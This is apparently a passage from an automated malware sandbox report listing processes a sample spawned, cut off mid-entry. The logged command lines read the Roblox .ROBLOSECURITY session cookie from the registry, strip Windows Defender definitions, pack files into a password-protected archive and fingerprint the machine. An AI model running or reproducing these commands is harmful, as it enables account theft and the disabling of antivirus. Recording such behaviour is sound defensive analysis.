                                                                                                                                                                                                                                              Start date:10/01/2025
                                                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                              Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              Target ID:58
                                                                                                                                                                                                                                              Start time:05:00:15
                                                                                                                                                                                                                                              Start date:10/01/2025
                                                                                                                                                                                                                                              Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\c4gv4hox\c4gv4hox.cmdline"
                                                                                                                                                                                                                                              Imagebase:0x7ff7f9860000
                                                                                                                                                                                                                                              File size:2'759'232 bytes
                                                                                                                                                                                                                                              MD5 hash:F65B029562077B648A6A5F6A1AA76A66
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              Target ID:59
                                                                                                                                                                                                                                              Start time:05:00:15
                                                                                                                                                                                                                                              Start date:10/01/2025
                                                                                                                                                                                                                                              Path:C:\Windows\System32\getmac.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:getmac
                                                                                                                                                                                                                                              Imagebase:0x7ff6869b0000
                                                                                                                                                                                                                                              File size:90'112 bytes
                                                                                                                                                                                                                                              MD5 hash:7D4B72DFF5B8E98DD1351A401E402C33
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              Target ID:60
                                                                                                                                                                                                                                              Start time:05:00:15
                                                                                                                                                                                                                                              Start date:10/01/2025
                                                                                                                                                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                                                                                                                                                                                              Imagebase:0x7ff7546d0000
                                                                                                                                                                                                                                              File size:289'792 bytes
                                                                                                                                                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              Target ID:61
                                                                                                                                                                                                                                              Start time:05:00:15
                                                                                                                                                                                                                                              Start date:10/01/2025
                                                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                              Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              Target ID:62
                                                                                                                                                                                                                                              Start time:05:00:15
                                                                                                                                                                                                                                              Start date:10/01/2025
                                                                                                                                                                                                                                              Path:C:\Windows\System32\tree.com
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:tree /A /F
                                                                                                                                                                                                                                              Imagebase:0x7ff6bec80000
                                                                                                                                                                                                                                              File size:20'992 bytes
                                                                                                                                                                                                                                              MD5 hash:9EB969EF56718A6243BF60350CD065F0
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              Target ID:63
                                                                                                                                                                                                                                              Start time:05:00:16
                                                                                                                                                                                                                                              Start date:10/01/2025
                                                                                                                                                                                                                                              Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESF5CD.tmp" "c:\Users\user\AppData\Local\Temp\c4gv4hox\CSCF22C8917EB0C431F96BD8AEEEA495758.TMP"
                                                                                                                                                                                                                                              Imagebase:0x7ff735c70000
                                                                                                                                                                                                                                              File size:52'744 bytes
                                                                                                                                                                                                                                              MD5 hash:C877CBB966EA5939AA2A17B6A5160950
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              Target ID:64
                                                                                                                                                                                                                                              Start time:05:00:17
                                                                                                                                                                                                                                              Start date:10/01/2025
                                                                                                                                                                                                                                              Path:C:\Windows\System32\SIHClient.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:C:\Windows\System32\sihclient.exe /cv g+FHZVRhzUydp9rkwD8VSQ.0.2
                                                                                                                                                                                                                                              Imagebase:0x7ff7ec580000
                                                                                                                                                                                                                                              File size:380'720 bytes
                                                                                                                                                                                                                                              MD5 hash:8BE47315BF30475EEECE8E39599E9273
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              Target ID:65
                                                                                                                                                                                                                                              Start time:05:00:17
                                                                                                                                                                                                                                              Start date:10/01/2025
                                                                                                                                                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                                                                                                                                                                                              Imagebase:0x7ff7546d0000
                                                                                                                                                                                                                                              File size:289'792 bytes
                                                                                                                                                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              Target ID:66
                                                                                                                                                                                                                                              Start time:05:00:17
                                                                                                                                                                                                                                              Start date:10/01/2025
                                                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                              Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              Target ID:67
                                                                                                                                                                                                                                              Start time:05:00:17
                                                                                                                                                                                                                                              Start date:10/01/2025
                                                                                                                                                                                                                                              Path:C:\Windows\System32\tree.com
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:tree /A /F
                                                                                                                                                                                                                                              Imagebase:0x7ff6bec80000
                                                                                                                                                                                                                                              File size:20'992 bytes
                                                                                                                                                                                                                                              MD5 hash:9EB969EF56718A6243BF60350CD065F0
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              Target ID:68
                                                                                                                                                                                                                                              Start time:05:00:17
                                                                                                                                                                                                                                              Start date:10/01/2025
                                                                                                                                                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                                                                                                                                                                                                                                              Imagebase:0x7ff7546d0000
                                                                                                                                                                                                                                              File size:289'792 bytes
                                                                                                                                                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              Target ID:69
                                                                                                                                                                                                                                              Start time:05:00:17
                                                                                                                                                                                                                                              Start date:10/01/2025
                                                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                              Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              Target ID:70
                                                                                                                                                                                                                                              Start time:05:00:17
                                                                                                                                                                                                                                              Start date:10/01/2025
                                                                                                                                                                                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                                                                                                                                                                                                                              Imagebase:0x7ff7be880000
                                                                                                                                                                                                                                              File size:452'608 bytes
                                                                                                                                                                                                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              Target ID:71
                                                                                                                                                                                                                                              Start time:05:00:19
                                                                                                                                                                                                                                              Start date:10/01/2025
                                                                                                                                                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                                                                                                                                                                                                                                              Imagebase:0x7ff7546d0000
                                                                                                                                                                                                                                              File size:289'792 bytes
                                                                                                                                                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              Target ID:72
                                                                                                                                                                                                                                              Start time:05:00:19
                                                                                                                                                                                                                                              Start date:10/01/2025
                                                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                              Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              Target ID:73
                                                                                                                                                                                                                                              Start time:05:00:19
                                                                                                                                                                                                                                              Start date:10/01/2025
                                                                                                                                                                                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                                                                                                                                                                                                                              Imagebase:0x7ff7be880000
                                                                                                                                                                                                                                              File size:452'608 bytes
                                                                                                                                                                                                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              Target ID:74
                                                                                                                                                                                                                                              Start time:05:00:24
                                                                                                                                                                                                                                              Start date:10/01/2025
                                                                                                                                                                                                                                              Path:C:\Program Files\Windows Defender\MpCmdRun.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
                                                                                                                                                                                                                                              Imagebase:0x7ff709920000
                                                                                                                                                                                                                                              File size:468'120 bytes
                                                                                                                                                                                                                                              MD5 hash:B3676839B2EE96983F9ED735CD044159
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              Target ID:75
                                                                                                                                                                                                                                              Start time:05:00:31
                                                                                                                                                                                                                                              Start date:10/01/2025
                                                                                                                                                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI57082\rar.exe a -r -hp"y" "C:\Users\user\AppData\Local\Temp\Ffb7z.zip" *"
                                                                                                                                                                                                                                              Imagebase:0x7ff7546d0000
                                                                                                                                                                                                                                              File size:289'792 bytes
                                                                                                                                                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              Target ID:76
                                                                                                                                                                                                                                              Start time:05:00:31
                                                                                                                                                                                                                                              Start date:10/01/2025
                                                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                              Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              Target ID:77
                                                                                                                                                                                                                                              Start time:05:00:31
                                                                                                                                                                                                                                              Start date:10/01/2025
                                                                                                                                                                                                                                              Path:C:\Users\user\AppData\Local\Temp\_MEI57082\rar.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:C:\Users\user\AppData\Local\Temp\_MEI57082\rar.exe a -r -hp"y" "C:\Users\user\AppData\Local\Temp\Ffb7z.zip" *
                                                                                                                                                                                                                                              Imagebase:0x7ff754240000
                                                                                                                                                                                                                                              File size:630'736 bytes
                                                                                                                                                                                                                                              MD5 hash:9C223575AE5B9544BC3D69AC6364F75E
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Antivirus matches:
                                                                                                                                                                                                                                              • Detection: 0%, ReversingLabs
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              Target ID:78
                                                                                                                                                                                                                                              Start time:05:00:33
                                                                                                                                                                                                                                              Start date:10/01/2025
                                                                                                                                                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\cmd.exe /c "wmic os get Caption"
                                                                                                                                                                                                                                              Imagebase:0x7ff7546d0000
                                                                                                                                                                                                                                              File size:289'792 bytes
                                                                                                                                                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              Target ID:79
                                                                                                                                                                                                                                              Start time:05:00:33
                                                                                                                                                                                                                                              Start date:10/01/2025
                                                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                              Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              Target ID:80
                                                                                                                                                                                                                                              Start time:05:00:33
                                                                                                                                                                                                                                              Start date:10/01/2025
                                                                                                                                                                                                                                              Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:wmic os get Caption
                                                                                                                                                                                                                                              Imagebase:0x7ff698260000
                                                                                                                                                                                                                                              File size:576'000 bytes
                                                                                                                                                                                                                                              MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              Target ID:81
                                                                                                                                                                                                                                              Start time:05:00:34
                                                                                                                                                                                                                                              Start date:10/01/2025
                                                                                                                                                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
                                                                                                                                                                                                                                              Imagebase:0x7ff7546d0000
                                                                                                                                                                                                                                              File size:289'792 bytes
                                                                                                                                                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              Target ID:82
                                                                                                                                                                                                                                              Start time:05:00:34
                                                                                                                                                                                                                                              Start date:10/01/2025
                                                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                              Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              Target ID:83
                                                                                                                                                                                                                                              Start time:05:00:34
                                                                                                                                                                                                                                              Start date:10/01/2025
                                                                                                                                                                                                                                              Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:wmic computersystem get totalphysicalmemory
                                                                                                                                                                                                                                              Imagebase:0x7ff698260000
                                                                                                                                                                                                                                              File size:576'000 bytes
                                                                                                                                                                                                                                              MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              Target ID:84
                                                                                                                                                                                                                                              Start time:05:00:35
                                                                                                                                                                                                                                              Start date:10/01/2025
                                                                                                                                                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
                                                                                                                                                                                                                                              Imagebase:0x7ff7546d0000
                                                                                                                                                                                                                                              File size:289'792 bytes
                                                                                                                                                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              Target ID:85
                                                                                                                                                                                                                                              Start time:05:00:35
                                                                                                                                                                                                                                              Start date:10/01/2025
                                                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                              Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              Target ID:86
                                                                                                                                                                                                                                              Start time:05:00:35
                                                                                                                                                                                                                                              Start date:10/01/2025
                                                                                                                                                                                                                                              Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:wmic csproduct get uuid
                                                                                                                                                                                                                                              Imagebase:0x7ff698260000
                                                                                                                                                                                                                                              File size:576'000 bytes
                                                                                                                                                                                                                                              MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              Target ID:87
                                                                                                                                                                                                                                              Start time:05:00:36
                                                                                                                                                                                                                                              Start date:10/01/2025
                                                                                                                                                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
                                                                                                                                                                                                                                              Imagebase:0x7ff7546d0000
                                                                                                                                                                                                                                              File size:289'792 bytes
                                                                                                                                                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              Target ID:88
                                                                                                                                                                                                                                              Start time:05:00:36
                                                                                                                                                                                                                                              Start date:10/01/2025
                                                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                              Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              Target ID:89
                                                                                                                                                                                                                                              Start time:05:00:36
                                                                                                                                                                                                                                              Start date:10/01/2025
                                                                                                                                                                                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
                                                                                                                                                                                                                                              Imagebase:0x7ff7be880000
                                                                                                                                                                                                                                              File size:452'608 bytes
                                                                                                                                                                                                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              Target ID:90
                                                                                                                                                                                                                                              Start time:05:00:37
                                                                                                                                                                                                                                              Start date:10/01/2025
                                                                                                                                                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
                                                                                                                                                                                                                                              Imagebase:0x7ff7546d0000
                                                                                                                                                                                                                                              File size:289'792 bytes
                                                                                                                                                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              Target ID:91
                                                                                                                                                                                                                                              Start time:05:00:37
                                                                                                                                                                                                                                              Start date:10/01/2025
                                                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                              Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              Target ID:92
                                                                                                                                                                                                                                              Start time:05:00:37
                                                                                                                                                                                                                                              Start date:10/01/2025
                                                                                                                                                                                                                                              Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:wmic path win32_VideoController get name
                                                                                                                                                                                                                                              Imagebase:0x7ff698260000
                                                                                                                                                                                                                                              File size:576'000 bytes
                                                                                                                                                                                                                                              MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              Target ID:93
                                                                                                                                                                                                                                              Start time:05:00:38
                                                                                                                                                                                                                                              Start date:10/01/2025
                                                                                                                                                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
